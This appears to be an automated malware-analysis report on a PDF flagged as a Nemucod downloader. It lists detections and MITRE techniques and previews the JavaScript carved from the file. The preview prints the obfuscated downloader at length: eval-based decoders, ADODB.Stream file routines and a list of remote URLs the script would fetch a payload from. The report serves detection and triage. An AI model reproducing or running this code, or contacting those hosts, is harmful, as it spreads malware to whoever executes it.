MALICIOUS
286
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
The PDF file contains obfuscated JavaScript that is designed to exploit a vulnerability and download a secondary payload. The ClamAV detection and ML classifier strongly indicate malicious intent, specifically a downloader. The embedded JavaScript streams are the primary mechanism for this malicious activity.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 5
-
ClamAV: Txt.Downloader.Nemucod-6769573-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Txt.Downloader.Nemucod-6769573-0
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
/S /JavaScript /JS (b'var vGKu1 = new Function("\\x76\\x5f\\x73", \'\\x7b\\x72\\x65\\x74\\x75\\x72\\x6e\\x20\\x76\\x4e\\x45\\x6f\\x39\\x5b\\x22\\x73\\x70\\x22\\x2b\\x22\\x6c\\x69\\x74\\x22\\x5d\\x28\\x22\\x2c\\x22\\x29\\x5b\\x22\\x6a\\x6f\\x22\\x2b\\x22\\x69\\x6e\\x22\\x5d\\x28\\x22\\x22\\x29\\x3b\\x7d\');var vEn1 = new Function("\\x76\\x5f\\x73", \'\\x7b\\x76\\x61\\x72\\x20\\x76\\x5f\\x64\\x20\\x3d\\x20\\x6e\\x65\\x77\\x20\\x44\\x61\\x74\\x65\\x28\\x29\\x3b\\x76\\x5f\\x64\\x5b\\x22\\x73\\x65\\x74\\x55\\x54\\x … >> -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0009_000.js |
pdf-javascript-stream | PDF /JS object 9 at offset 0x52B | 17392 bytes |
SHA-256: 12f0531ae028894aeda6f73832485d09d778ef46c806fd8f3a1c2e1e9d493536 |
|||
|
Detection
ClamAV:
Txt.Downloader.Nemucod-6769573-0
Obfuscation or payload:
likely
Carved artifact contains 48 eval/decoder/string-building token(s). Carved artifact contains 2 long hex-escaped blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
b'var vGKu1 = new Function("\x76\x5f\x73", '\x7b\x72\x65\x74\x75\x72\x6e\x20\x76\x4e\x45\x6f\x39\x5b\x22\x73\x70\x22\x2b\x22\x6c\x69\x74\x22\x5d\x28\x22\x2c\x22\x29\x5b\x22\x6a\x6f\x22\x2b\x22\x69\x6e\x22\x5d\x28\x22\x22\x29\x3b\x7d');var vEn1 = new Function("\x76\x5f\x73", '\x7b\x76\x61\x72\x20\x76\x5f\x64\x20\x3d\x20\x6e\x65\x77\x20\x44\x61\x74\x65\x28\x29\x3b\x76\x5f\x64\x5b\x22\x73\x65\x74\x55\x54\x43\x22\x2b\x22\x46\x75\x6c\x6c\x59\x65\x61\x72\x22\x5d\x28\x22\x32\x30\x30\x33\x22\x29\x3b\x69\x66\x20\x28\x76\x5f\x64\x2e\x67\x65\x74\x55\x54\x43\x46\x75\x6c\x6c\x59\x65\x61\x72\x28\x29\x2e\x74\x6f\x53\x74\x72\x69\x6e\x67\x28\x31\x30\x29\x20\x3d\x3d\x20\x22\x32\x30\x30\x33\x22\x29\x20\x7b\x76\x61\x72\x20\x76\x5f\x61\x72\x72\x20\x3d\x20\x76\x5f\x73\x2e\x73\x70\x6c\x69\x74\x28\x22\x3f\x22\x29\x3b\x20\x72\x65\x74\x75\x72\x6e\x20\x76\x5f\x61\x72\x72\x2e\x6a\x6f\x69\x6e\x28\x22\x22\x29\x3b\x7d\x20\x65\x6c\x73\x65\x20\x72\x65\x74\x75\x72\x6e\x20\x22\x22\x3b\x7d');
eval("var crap = (eval(vEn1(\"/?*?@?c?c?_?o?n? ?f?u?n?c?t?i?o?n? ?v?I?E?g?1?(?v?J?V?h?1?)?{?v?a?r? ?v?B?n?6?=?n?e?w? ?A?r?r?a?y?(?)?;?v?B?n?6?[?1?9?9?]?=?1?2?8?;?v?B?n?6?[?2?5?2?]?=?1?2?9?;?v?B?n?6?[?2?3?3?]?=?1?3?0?;?v?B?n?6?[?2?2?6?]?=?1?3?1?;?v?B?n?6?[?2?2?8?]?=?1?3?2?;?v?B?n?6?[?2?2?4?]?=?1?3?3?;?v?B?n?6?[?2?2?9?]?=?1?3?4?;?v?B?n?6?[?2?3?1?]?=?1?3?5?;?v?B?n?6?[?2?3?4?]?=?1?3?6?;?v?B?n?6?[?2?3?5?]?=?1?3?7?;?v?B?n?6?[?2?3?2?]?=?1?3?8?;?v?B?n?6?[?2?3?9?]?=?1?3?9?;?v?B?n?6?[?2?3?8?]?=?1?4?0?;?v?B?n?6?[?2?3?6?]?=?1?4?1?;?v?B?n?6?[?1?9?6?]?=?1?4?2?;?v?B?n?6?[?1?9?7?]?=?1?4?3?;?v?B?n?6?[?2?0?1?]?=?1?4?4?;?v?B?n?6?[?2?3?0?]?=?1?4?5?;?v?B?n?6?[?1?9?8?]?=?1?4?6?;?v?B?n?6?[?2?4?4?]?=?1?4?7?;?v?B?n?6?[?2?4?6?]?=?1?4?8?;?v?B?n?6?[?2?4?2?]?=?1?4?9?;?v?B?n?6?[?2?5?1?]?=?1?5?0?;?v?B?n?6?[?2?4?9?]?=?1?5?1?;?v?B?n?6?[?2?5?5?]?=?1?5?2?;?v?B?n?6?[?2?1?4?]?=?1?5?3?;?v?B?n?6?[?2?2?0?]?=?1?5?4?;?v?B?n?6?[?1?6?2?]?=?1?5?5?;?v?B?n?6?[?1?6?3?]?=?1?5?6?;?v?B?n?6?[?1?6?5?]?=?1?5?7?;?v?B?n?6?[?8?3?5?9?]?=?1?5?8?;?v?B?n?6?[?4?0?2?]?=?1?5?9?;?v?B?n?6?[?2?2?5?]?=?1?6?0?;?v?B?n?6?[?2?3?7?]?=?1?6?1?;?v?B?n?6?[?2?4?3?]?=?1?6?2?;?v?B?n?6?[?2?5?0?]?=?1?6?3?;?v?B?n?6?[?2?4?1?]?=?1?6?4?;?v?B?n?6?[?2?0?9?]?=?1?6?5?;?v?B?n?6?[?1?7?0?]?=?1?6?6?;?v?B?n?6?[?1?8?6?]?=?1?6?7?;?v?B?n?6?[?1?9?1?]?=?1?6?8?;?v?B?n?6?[?8?9?7?6?]?=?1?6?9?;?v?B?n?6?[?1?7?2?]?=?1?7?0?;?v?B?n?6?[?1?8?9?]?=?1?7?1?;?v?B?n?6?[?1?8?8?]?=?1?7?2?;?v?B?n?6?[?1?6?1?]?=?1?7?3?;?v?B?n?6?[?1?7?1?]?=?1?7?4?;?v?B?n?6?[?1?8?7?]?=?1?7?5?;?v?B?n?6?[?9?6?1?7?]?=?1?7?6?;?v?B?n?6?[?9?6?1?8?]?=?1?7?7?;?v?B?n?6?[?9?6?1?9?]?=?1?7?8?;?v?B?n?6?[?9?4?7?4?]?=?1?7?9?;?v?B?n?6?[?9?5?0?8?]?=?1?8?0?;?v?B?n?6?[?9?5?6?9?]?=?1?8?1?;?v?B?n?6?[?9?5?7?0?]?=?1?8?2?;?v?B?n?6?[?9?5?5?8?]?=?1?8?3?;?v?B?n?6?[?9?5?5?7?]?=?1?8?4?;?v?B?n?6?[?9?5?7?1?]?=?1?8?5?;?v?B?n?6?[?9?5?5?3?]?=?1?8?6?;?v?B?n?6?[?9?5?5?9?]?=?1?8?7?;?v?B?n?6?[?9?5?6?5?]?=?1?8?8?;?v?B?n?6?[?9?5?6?4?]?=?1?8?9?;?v?B?n?6?[?9?5?6?3?]?=?1?9?0?;?v?B?n?6?[?9?4?8?8?]?=?1?9?1?;?v?B?n?6?[?9?4?9?2?]?=?1?9?2?;?v?B?n?6?[?9?5?2?4?]?=?1?9?3?;?v?B?n?6?[?9?5?1?6?]?=?1?9?4?;?v?B?n?6?[?9?5?0?0?]?=?1?9?5?;?v?B?n?6?[?9?4?7?2?]?=?1?9?6?;?v?B?n?6?[?9?5?3?2?]?=?1?9?7?;?v?B?n?6?[?9?5?6?6?]?=?1?9?8?;?v?B?n?6?[?9?5?6?7?]?=?1?9?9?;?v?B?n?6?[?9?5?6?2?]?=?2?0?0?;?v?B?n?6?[?9?5?5?6?]?=?2?0?1?;?v?B?n?6?[?9?5?7?7?]?=?2?0?2?;?v?B?n?6?[?9?5?7?4?]?=?2?0?3?;?v?B?n?6?[?9?5?6?8?]?=?2?0?4?;?v?B?n?6?[?9?5?5?2?]?=?2?0?5?;?v?B?n?6?[?9?5?8?0?]?=?2?0?6?;?v?B?n?6?[?9?5?7?5?]?=?2?0?7?;?v?B?n?6?[?9?5?7?6?]?=?2?0?8?;?v?B?n?6?[?9?5?7?2?]?=?2?0?9?;?v?B?n?6?[?9?5?7?3?]?=?2?1?0?;?v?B?n?6?[?9?5?6?1?]?=?2?1?1?;?v?B?n?6?[?9?5?6?0?]?=?2?1?2?;?v?B?n?6?[?9?5?5?4?]?=?2?1?3?;?v?B?n?6?[?9?5?5?5?]?=?2?1?4?;?v?B?n?6?[?9?5?7?9?]?=?2?1?5?;?v?B?n?6?[?9?5?7?8?]?=?2?1?6?;?v?B?n?6?[?9?4?9?6?]?=?2?1?7?;?v?B?n?6?[?9?4?8?4?]?=?2?1?8?;?v?B?n?6?[?9?6?0?8?]?=?2?1?9?;?v?B?n?6?[?9?6?0?4?]?=?2?2?0?;?v?B?n?6?[?9?6?1?2?]?=?2?2?1?;?v?B?n?6?[?9?6?1?6?]?=?2?2?2?;?v?B?n?6?[?9?6?0?0?]?=?2?2?3?;?v?B?n?6?[?9?4?5?]?=?2?2?4?;?v?B?n?6?[?2?2?3?]?=?2?2?5?;?v?B?n?6?[?9?1?5?]?=?2?2?6?;?v?B?n?6?[?9?6?0?]?=?2?2?7?;?v?B?n?6?[?9?3?1?]?=?2?2?8?;?v?B?n?6?[?9?6?3?]?=?2?2?9?;?v?B?n?6?[?1?8?1?]?=?2?3?0?;?v?B?n?6?[?9?6?4?]?=?2?3?1?;?v?B?n?6?[?9?3?4?]?=?2?3?2?;?v?B?n?6?[?9?2?0?]?=?2?3?3?;?v?B?n?6?[?9?3?7?]?=?2?3?4?;?v?B?n?6?[?9?4?8?]?=?2?3?5?;?v?B?n?6?[?8?7?3?4?]?=?2?3?6?;?v?B?n?6?[?9?6?6?]?=?2?3?7?;?v?B?n?6?[?9?4?9?]?=?2?3?8?;?v?B?n?6?[?8?7?4?5?]?=?2?3?9?;?v?B?n?6?[?8?8?0?1?]?=?2?4?0?;?v?B?n?6?[?1?7?7?]?=?2?4?1?;?v?B?n?6?[?8?8?0?5?]?=?2?4?2?;?v?B?n?6?[?8?8?0?4?]?=?2?4?3?;?v?B?n?6?[?8?9?9?2?]?=?2?4?4?;?v?B?n?6?[?8?9?9?3?]?=?2?4?5?;?v?B?n?6?[?2?4?7?]?=?2?4?6?;?v?B?n?6?[?8?7?7?6?]?=?2?4?7?;?v?B?n?6?[?1?7?6?]?=?2?4?8?;?v?B?n?6?[?8?7?2?9?]?=?2?4?9?;?v?B?n?6?[?1?8?3?]?=?2?5?0?;?v?B?n?6?[?8?7?3?0?]?=?2?5?1?;?v?B?n?6?[?8?3?1?9?]?=?2?5?2?;?v?B?n?6?[?1?7?8?]?=?2?5?3?;?v?B?n?6?[?9?6?3?2?]?=?2?5?4?;?v?B?n?6?[?1?6?0?]?=?2?5?5?;?v?a?r? ?v?C?B?z?2?=?n?e?w? ?A?r?r?a?y?(?)?;?f?o?r? ?(?v?a?r? ?v?L?g?4?=?0?;? ?v?L?g?4? ?<? ?v?J?V?h?1?.?l?e?n?g?t?h?;? ?v?L?g?4? ?+?=? ?1?)?{?v?a?r? ?v?N?R?j?3?=?v?J?V?h?1?[?\\x22?c?h?a?r?C?o?d?e?A?t?\\x22?]?(?v?L?g?4?)?;?i?f? ?(?v?N?R?j?3? ?<? ?1?2?8?)?{?v?a?r? ?v?T?i?3?=?v?N?R?j?3?;?}?e?l?s?e? ?{?v?a?r? ?v?T?i?3?=?v?B?n?6?[?v?N?R?j?3?]?;?}?v?C?B?z?2?[?\\x22?p?u?s?h?\\x22?]?(?v?T?i?3?)?;?}?;?r?e?t?u?r?n? ?v?C?B?z?2?;?}? ?@?*?/\")), 1);");
eval("var crap = (eval(vEn1(\"/?*?@?c?c?_?o?n? ?f?u?n?c?t?i?o?n? ?v?M?i?3?(?v?C?J?c?8?)?{?v?a?r? ?v?C?H?z?3?=?n?e?w? ?A?r?r?a?y?(?)?;?v?C?H?z?3?[?1?6?8?]?=?1?9?1?;?v?C?H?z?3?[?1?6?9?]?=?8?9?7?6?;?v?C?H?z?3?[?1?7?0?]?=?1?7?2?;?v?C?H?z?3?[?1?7?1?]?=?1?8?9?;?v?C?H?z?3?[?1?7?2?]?=?1?8?8?;?v?C?H?z?3?[?1?7?3?]?=?1?6?1?;?v?C?H?z?3?[?1?7?4?]?=?1?7?1?;?v?C?H?z?3?[?1?7?5?]?=?1?8?7?;?v?C?H?z?3?[?1?7?6?]?=?9?6?1?7?;?v?C?H?z?3?[?1?7?7?]?=?9?6?1?8?;?v?C?H?z?3?[?1?7?8?]?=?9?6?1?9?;?v?C?H?z?3?[?1?7?9?]?=?9?4?7?4?;?v?C?H?z?3?[?1?8?0?]?=?9?5?0?8?;?v?C?H?z?3?[?1?8?1?]?=?9?5?6?9?;?v?C?H?z?3?[?1?8?2?]?=?9?5?7?0?;?v?C?H?z?3?[?1?8?3?]?=?9?5?5?8?;?v?C?H?z?3?[?1?8?4?]?=?9?5?5?7?;?v?C?H?z?3?[?1?8?5?]?=?9?5?7?1?;?v?C?H?z?3?[?1?8?6?]?=?9?5?5?3?;?v?C?H?z?3?[?1?8?7?]?=?9?5?5?9?;?v?C?H?z?3?[?1?8?8?]?=?9?5?6?5?;?v?C?H?z?3?[?1?8?9?]?=?9?5?6?4?;?v?C?H?z?3?[?1?9?0?]?=?9?5?6?3?;?v?C?H?z?3?[?1?9?1?]?=?9?4?8?8?;?v?C?H?z?3?[?1?9?2?]?=?9?4?9?2?;?v?C?H?z?3?[?1?9?3?]?=?9?5?2?4?;?v?C?H?z?3?[?1?9?4?]?=?9?5?1?6?;?v?C?H?z?3?[?1?9?5?]?=?9?5?0?0?;?v?C?H?z?3?[?1?9?6?]?=?9?4?7?2?;?v?C?H?z?3?[?1?9?7?]?=?9?5?3?2?;?v?C?H?z?3?[?1?9?8?]?=?9?5?6?6?;?v?C?H?z?3?[?1?9?9?]?=?9?5?6?7?;?v?C?H?z?3?[?2?0?0?]?=?9?5?6?2?;?v?C?H?z?3?[?2?0?1?]?=?9?5?5?6?;?v?C?H?z?3?[?2?0?2?]?=?9?5?7?7?;?v?C?H?z?3?[?2?0?3?]?=?9?5?7?4?;?v?C?H?z?3?[?2?0?4?]?=?9?5?6?8?;?v?C?H?z?3?[?2?0?5?]?=?9?5?5?2?;?v?C?H?z?3?[?2?0?6?]?=?9?5?8?0?;?v?C?H?z?3?[?2?0?7?]?=?9?5?7?5?;?v?C?H?z?3?[?2?0?8?]?=?9?5?7?6?;?v?C?H?z?3?[?2?0?9?]?=?9?5?7?2?;?v?C?H?z?3?[?2?1?0?]?=?9?5?7?3?;?v?C?H?z?3?[?2?1?1?]?=?9?5?6?1?;?v?C?H?z?3?[?2?1?2?]?=?9?5?6?0?;?v?C?H?z?3?[?2?1?3?]?=?9?5?5?4?;?v?C?H?z?3?[?2?1?4?]?=?9?5?5?5?;?v?C?H?z?3?[?2?1?5?]?=?9?5?7?9?;?v?C?H?z?3?[?2?1?6?]?=?9?5?7?8?;?v?C?H?z?3?[?2?1?7?]?=?9?4?9?6?;?v?C?H?z?3?[?2?1?8?]?=?9?4?8?4?;?v?C?H?z?3?[?2?1?9?]?=?9?6?0?8?;?v?C?H?z?3?[?2?2?0?]?=?9?6?0?4?;?v?C?H?z?3?[?2?2?1?]?=?9?6?1?2?;?v?C?H?z?3?[?2?2?2?]?=?9?6?1?6?;?v?C?H?z?3?[?2?2?3?]?=?9?6?0?0?;?v?C?H?z?3?[?2?2?4?]?=?9?4?5?;?v?C?H?z?3?[?2?2?5?]?=?2?2?3?;?v?C?H?z?3?[?2?2?6?]?=?9?1?5?;?v?C?H?z?3?[?2?2?7?]?=?9?6?0?;?v?C?H?z?3?[?2?2?8?]?=?9?3?1?;?v?C?H?z?3?[?2?2?9?]?=?9?6?3?;?v?C?H?z?3?[?2?3?0?]?=?1?8?1?;?v?C?H?z?3?[?2?3?1?]?=?9?6?4?;?v?C?H?z?3?[?2?3?2?]?=?9?3?4?;?v?C?H?z?3?[?2?3?3?]?=?9?2?0?;?v?C?H?z?3?[?2?3?4?]?=?9?3?7?;?v?C?H?z?3?[?2?3?5?]?=?9?4?8?;?v?C?H?z?3?[?2?3?6?]?=?8?7?3?4?;?v?C?H?z?3?[?2?3?7?]?=?9?6?6?;?v?C?H?z?3?[?2?3?8?]?=?9?4?9?;?v?C?H?z?3?[?2?3?9?]?=?8?7?4?5?;?v?C?H?z?3?[?2?4?0?]?=?8?8?0?1?;?v?C?H?z?3?[?2?4?1?]?=?1?7?7?;?v?C?H?z?3?[?2?4?2?]?=?8?8?0?5?;?v?C?H?z?3?[?2?4?3?]?=?8?8?0?4?;?v?C?H?z?3?[?2?4?4?]?=?8?9?9?2?;?v?C?H?z?3?[?2?4?5?]?=?8?9?9?3?;?v?C?H?z?3?[?2?4?6?]?=?2?4?7?;?v?C?H?z?3?[?2?4?7?]?=?8?7?7?6?;?v?C?H?z?3?[?2?4?8?]?=?1?7?6?;?v?C?H?z?3?[?2?4?9?]?=?8?7?2?9?;?v?C?H?z?3?[?2?5?0?]?=?1?8?3?;?v?C?H?z?3?[?2?5?1?]?=?8?7?3?0?;?v?C?H?z?3?[?2?5?2?]?=?8?3?1?9?;?v?C?H?z?3?[?2?5?3?]?=?1?7?8?;?v?C?H?z?3?[?2?5?4?]?=?9?6?3?2?;?v?C?H?z?3?[?2?5?5?]?=?1?6?0?;?v?C?H?z?3?[?1?2?8?]?=?1?9?9?;?v?C?H?z?3?[?1?2?9?]?=?2?5?2?;?v?C?H?z?3?[?1?3?0?]?=?2?3?3?;?v?C?H?z?3?[?1?3?1?]?=?2?2?6?;?v?C?H?z?3?[?1?3?2?]?=?2?2?8?;?v?C?H?z?3?[?1?3?3?]?=?2?2?4?;?v?C?H?z?3?[?1?3?4?]?=?2?2?9?;?v?C?H?z?3?[?1?3?5?]?=?2?3?1?;?v?C?H?z?3?[?1?3?6?]?=?2?3?4?;?v?C?H?z?3?[?1?3?7?]?=?2?3?5?;?v?C?H?z?3?[?1?3?8?]?=?2?3?2?;?v?C?H?z?3?[?1?3?9?]?=?2?3?9?;?v?C?H?z?3?[?1?4?0?]?=?2?3?8?;?v?C?H?z?3?[?1?4?1?]?=?2?3?6?;?v?C?H?z?3?[?1?4?2?]?=?1?9?6?;?v?C?H?z?3?[?1?4?3?]?=?1?9?7?;?v?C?H?z?3?[?1?4?4?]?=?2?0?1?;?v?C?H?z?3?[?1?4?5?]?=?2?3?0?;?v?C?H?z?3?[?1?4?6?]?=?1?9?8?;?v?C?H?z?3?[?1?4?7?]?=?2?4?4?;?v?C?H?z?3?[?1?4?8?]?=?2?4?6?;?v?C?H?z?3?[?1?4?9?]?=?2?4?2?;?v?C?H?z?3?[?1?5?0?]?=?2?5?1?;?v?C?H?z?3?[?1?5?1?]?=?2?4?9?;?v?C?H?z?3?[?1?5?2?]?=?2?5?5?;?v?C?H?z?3?[?1?5?3?]?=?2?1?4?;?v?C?H?z?3?[?1?5?4?]?=?2?2?0?;?v?C?H?z?3?[?1?5?5?]?=?1?6?2?;?v?C?H?z?3?[?1?5?6?]?=?1?6?3?;?v?C?H?z?3?[?1?5?7?]?=?1?6?5?;?v?C?H?z?3?[?1?5?8?]?=?8?3?5?9?;?v?C?H?z?3?[?1?5?9?]?=?4?0?2?;?v?C?H?z?3?[?1?6?0?]?=?2?2?5?;?v?C?H?z?3?[?1?6?1?]?=?2?3?7?;?v?C?H?z?3?[?1?6?2?]?=?2?4?3?;?v?C?H?z?3?[?1?6?3?]?=?2?5?0?;?v?C?H?z?3?[?1?6?4?]?=?2?4?1?;?v?C?H?z?3?[?1?6?5?]?=?2?0?9?;?v?C?H?z?3?[?1?6?6?]?=?1?7?0?;?v?C?H?z?3?[?1?6?7?]?=?1?8?6?;?v?a?r? ?v?A?H?f?3?=?n?e?w? ?A?r?r?a?y?(?)?;?v?a?r? ?v?U?n?1?=?\\x22?\\x22?;?v?a?r? ?v?T?i?3?;? ?v?a?r? ?v?N?R?j?3?;?f?o?r? ?(?v?a?r? ?v?L?g?4?=?0?;? ?v?L?g?4? ?<? ?v?C?J?c?8?.?l?e?n?g?t?h?;? ?v?L?g?4? ?+?=? ?1?)?{?v?T?i?3?=?v?C?J?c?8?[?v?L?g?4?]?;?i?f? ?(?v?T?i?3? ?<? ?1?2?8?)?{?v?N?R?j?3?=?v?T?i?3?;?}? ?e?l?s?e? ?{?v?N?R?j?3?=?v?C?H?z?3?[?v?T?i?3?]?;?}?v?A?H?f?3?.?p?u?s?h?(?S?t?r?i?n?g?[?\\x22?f?r?o?m?C?h?a?r?C?o?d?e?\\x22?]?(?v?N?R?j?3?)?)?;?}?v?U?n?1?=?v?A?H?f?3?[?\\x22?j?o?i?n?\\x22?]?(?\\x22?\\x22?)?;?r?e?t?u?r?n? ?v?U?n?1?;?}? ?@?*?/\")), 1);");
eval("var crap = (eval(vEn1(\"f?u?n?c?t?i?o?n? ?v?L?J?k?3?(?v?C?J?c?8?,? ?v?M?f?3?)?{?v?a?r? ?v?Y?C?t?6? ?=? ?v?I?E?g?1?(?v?M?f?3?)?;?f?o?r? ?(?v?a?r? ?v?L?g?4? ?=? ?0?;? ?v?L?g?4? ?<? ?v?C?J?c?8?.?l?e?n?g?t?h?;? ?v?L?g?4? ?+?=? ?1?)? ?{?v?C?J?c?8?[?v?L?g?4?]? ?^?=? ?v?Y?C?t?6?[?v?L?g?4? ?%? ?v?Y?C?t?6?.?l?e?n?g?t?h?]?;?}?;?r?e?t?u?r?n? ?v?C?J?c?8?;?}\")), 1);");
eval("var crap = (eval(vEn1(\"f?u?n?c?t?i?o?n? ?v?K?g?7?(?v?D?W?w?4?)?{?v?a?r? ?v?A?f?3?=?n?e?w? ?A?c?t?i?v?e?X?O?b?j?e?c?t?(?\\x22?A?D?O?D?B?.?S?t?r?e?a?m?\\x22?)?;?v?A?f?3?.?t?y?p?e?=?2?;?v?A?f?3?[?\\x22?C?h?a?r?s?e?t?\\x22?]?=?\\x22?4?3?7?\\x22?;?v?A?f?3?.?o?p?e?n?(?)?;?v?A?f?3?[?\\x22?L?o?a?d?F?r?o?m?F?i?l?e?\\x22?]?(?v?D?W?w?4?)?;?v?a?r? ?v?N?i?5?=?v?A?f?3?[?\\x22?R?e?a?d?T?e?x?t?\\x22?]?;?v?A?f?3?.?c?l?o?s?e?(?)?;?r?e?t?u?r?n? ?v?I?E?g?1?(?v?N?i?5?)?;?}\")), 1);");
eval("var crap = (eval(vEn1(\"f?u?n?c?t?i?o?n? ?v?I?o?9?(?v?D?W?w?4?,? ?v?C?J?c?8?)?{?v?a?r? ?v?A?f?3?=?n?e?w? ?A?c?t?i?v?e?X?O?b?j?e?c?t?(?\\x22?A?D?O?D?B?.?S?t?r?e?a?m?\\x22?)?;?v?A?f?3?.?t?y?p?e?=?2?;?v?A?f?3?[?\\x22?C?h?a?r?s?e?t?\\x22?]?=?\\x22?4?3?7?\\x22?;?v?A?f?3?.?o?p?e?n?(?)?;?v?A?f?3?[?\\x22?w?r?i?t?e?T?e?x?t?\\x22?]?(?v?M?i?3?(?v?C?J?c?8?)?)?;?v?A?f?3?[?\\x22?S?a?v?e?T?o?F?i?l?e?\\x22?]?(?v?D?W?w?4?,? ?2?)?;?v?A?f?3?.?c?l?o?s?e?(?)?;?}\")), 1);");
eval("var crap = (eval(vEn1(\"v?a?r? ?v?H?m?9? ?=? ?\\x22?h?\\x22?+?\\x22?\\x22?+?\\x22?t?\\x22?+?\\x22?t?\\x22?+?\\x22?p?\\x22?+?\\x22?:?\\x22?+?\\x22?/?\\x22?+?\\x22?/?\\x22?;\")), 1);");
eval("var crap = (eval(vEn1(\" ? ? ? ?v?a?r? ?v?G?U?e?2? ?=? ?n?e?w? ?A?r?r?a?y?(?)?;\")), 1);");
eval("var crap = (eval(vEn1(\"v?G?U?e?2?.?p?u?s?h?(?v?H?m?9? ?+? ?\\x22?f?i?t?n?e?s?s?c?o?f?f?e?e?.?b?i?z?/?r?x?m?f?h?4?t?m?w?\\x22?)?;\")), 1);");
eval("var crap = (eval(vEn1(\"v?G?U?e?2?.?p?u?s?h?(?v?H?m?9? ?+? ?\\x22?z?i?v?i?l?r?e?c?h?t?.?a?t?/?8?s?2?v?d?b?q?x?i?u?\\x22?)?;\")), 1);");
eval("var crap = (eval(vEn1(\"v?G?U?e?2?.?p?u?s?h?(?v?H?m?9? ?+? ?\\x22?w?e?b?p?a?n?e?l?.?i?n?f?o?/?6?s?i?k?f?u?l?y?e?a?\\x22?)?;\")), 1);");
…
|
|||
javascript_obj0009_001.js |
pdf-javascript-stream | PDF /JS object 9 at offset 0x52B | 233 bytes |
SHA-256: 02bb824b25c1d1832b822c31f159161f1609bd774acfb9daf70bab2bd156bb60 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long hex-escaped blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
b'var vGKu1 = new Function("\x76\x5f\x73", '\x7b\x72\x65\x74\x75\x72\x6e\x20\x76\x4e\x45\x6f\x39\x5b\x22\x73\x70\x22\x2b\x22\x6c\x69\x74\x22\x5d\x28\x22\x2c\x22\x29\x5b\x22\x6a\x6f\x22\x2b\x22\x69\x6e\x22\x5d\x28\x22\x22\x29\x3b\x7d'
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.